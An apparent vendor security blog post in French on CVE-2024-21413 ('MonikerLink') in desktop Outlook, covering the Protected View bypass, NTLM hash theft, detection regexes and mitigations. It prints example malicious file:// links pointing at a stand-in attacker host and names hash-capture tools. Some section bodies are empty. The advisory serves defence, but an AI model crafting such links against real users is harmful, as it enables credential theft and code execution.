剣 KENSAI
Critique CVE-2024-21413 Janvier 2026 · 8 min de lecture

CVE-2024-21413 : RCE MonikerLink dans Microsoft Outlook

Surnommée « MonikerLink », CVE-2024-21413 est une vulnérabilité critique de Microsoft Outlook qui contourne la Vue protégée pour parvenir à l'exécution de code à distance et au vol d'identifiants NTLM — simplement en prévisualisant un e-mail malveillant. CVSS 9.8 CRITIQUE. Aucune interaction utilisateur au-delà de la prévisualisation de l'e-mail n'est requise.


9.8
CRITIQUE
AttributValeur
ID CVECVE-2024-21413
Vecteur CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20 : Validation incorrecte des entrées
Publié le13 février 2024
ExploitationPoC publique — largement exploitée

Qu'est-ce que CVE-2024-21413 ?

CVE-2024-21413 exploite la façon dont Microsoft Outlook traite les hyperliens contenant le caractère ! (point d'exclamation) dans le cadre d'un URI de moniker de fichier. Normalement, Outlook applique la « Vue protégée » aux documents ouverts depuis un e-mail — isolant les documents Office pour empêcher l'exécution de code. Cette vulnérabilité contourne entièrement cette protection.

En créant un hyperlien au format file://ATTACKER-SERVER/test.rtf!something, un attaquant amène Outlook à ouvrir le fichier RTF sans la Vue protégée, tout en déclenchant simultanément une tentative d'authentification NTLM automatique vers le serveur SMB de l'attaquant. L'attaquant capture le hachage NTLMv2 pour le craquer hors ligne ou pour des attaques de relais.

🚨 Attaque via le volet de prévisualisation — Aucun clic requis

Cette vulnérabilité se déclenche dans le volet de prévisualisation d'Outlook. La victime doit seulement sélectionner l'e-mail dans sa boîte de réception — aucune ouverture de pièce jointe ni clic sur un lien n'est nécessaire. Dans un environnement d'entreprise, un seul e-mail de phishing envoyé à une liste de diffusion pourrait compromettre simultanément des centaines de hachages NTLMv2.

Produits concernés

ProduitVersions concernées
Microsoft Outlook 2016Avant la mise à jour de février 2024
Microsoft Outlook 2019Avant la mise à jour de février 2024
Microsoft Outlook LTSC 2021Avant la mise à jour de février 2024
Microsoft 365 Apps for EnterpriseAvant la mise à jour de février 2024

Non concerné : Outlook sur le web (OWA), Outlook pour iOS/Android, Outlook pour Mac. La vulnérabilité est spécifique aux clients Outlook de bureau sous Windows.

Mécanique de l'attaque : la technique MonikerLink

Le COM (Component Object Model) de Windows utilise des « monikers » pour lier des objets par leur nom. Le file:// schéma d'URI de Windows peut inclure un composant moniker après le caractère ! , ce qui indique à Windows de charger et d'activer l'objet COM référencé.


# Normal file link — Protected View applied
file://attacker.com/share/document.rtf

# MonikerLink bypass — ! bypasses Protected View
file://attacker.com/share/document.rtf!1337

# When Outlook processes the MonikerLink:
# 1. Attempts SMB connection to attacker.com
# 2. Sends NTLMv2 authentication (captures hash)
# 3. Opens file without Protected View
# 4. If file is malicious RTF → RCE

Flux de capture du hachage NTLM

Même sans fichier RTF armé, l'attaque de relais NTLM a un impact important :

  1. La victime prévisualise l'e-mail malveillant dans Outlook
  2. Outlook établit automatiquement une connexion SMB vers le serveur contrôlé par l'attaquant
  3. Windows envoie le défi-réponse NTLMv2 (hachage) pour s'authentifier
  4. L'attaquant capture le hachage avec Responder, Impacket ou des outils similaires
  5. Le hachage est craqué hors ligne (mots de passe faibles en quelques heures) ou relayé en temps réel vers d'autres services

Exploitation en situation réelle

Après la publication de la PoC publique, CVE-2024-21413 a été intégrée à des kits de phishing commerciaux en quelques jours. Les campagnes observées comprenaient :

Détection

Règles de la passerelle de messagerie


# Regex pattern for MonikerLink in email body/attachments
# Detect file:// links containing ! character
\bfile:\/\/[^\s"']+![^\s"']*

# Block external UNC/file links entirely (recommended)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

Détection réseau

Détection sur les postes

Atténuation

  1. Appliquer les correctifs de février 2024 : La mise à jour de sécurité Microsoft pour Outlook corrige le contournement de la Vue protégée
  2. Bloquer le trafic SMB sortant au périmètre : Des règles de pare-feu bloquant le trafic sortant TCP/445 et TCP/139 empêchent la capture de hachages NTLM même si la vulnérabilité se déclenche
  3. Activer les protections contre le relais NTLM : Configurer la signature SMB et la signature LDAP pour empêcher les attaques de relais
  4. Déployer une passerelle de sécurité de messagerie : Bloquer les e-mails contenant des liens file:// et \\ (chemin UNC) dans le corps et les pièces jointes
  5. Désactiver NTLM lorsque c'est possible : Les organisations utilisant Kerberos peuvent désactiver NTLM pour éliminer ce vecteur d'attaque de capture de hachage

💡 Défense en profondeur : Même si vous avez corrigé Outlook, bloquer le trafic SMB sortant au niveau du pare-feu est une bonne pratique qui empêche toute cette classe d'attaques. De nombreuses organisations autorisent le trafic SMB sortant pour des raisons de partage de fichiers hérité — auditez et restreignez cela immédiatement.

Capacité de détection KENSAI

Vos clients Outlook sont-ils protégés contre MonikerLink ?

KENSAI analyse votre parc de postes à la recherche de versions vulnérables d'Outlook et identifie les chemins réseau qui permettraient la capture de hachages NTLM. Obtenez une visibilité en quelques minutes.

Évaluez la surface d'attaque de votre messagerie →

Articles connexes

Plateforme de sécurité pour la gestion des vulnérabilités et la certification ISO 27001 Blog Sécurité Patch Tuesday de Microsoft : 84 vulnérabilités, attaque Stryker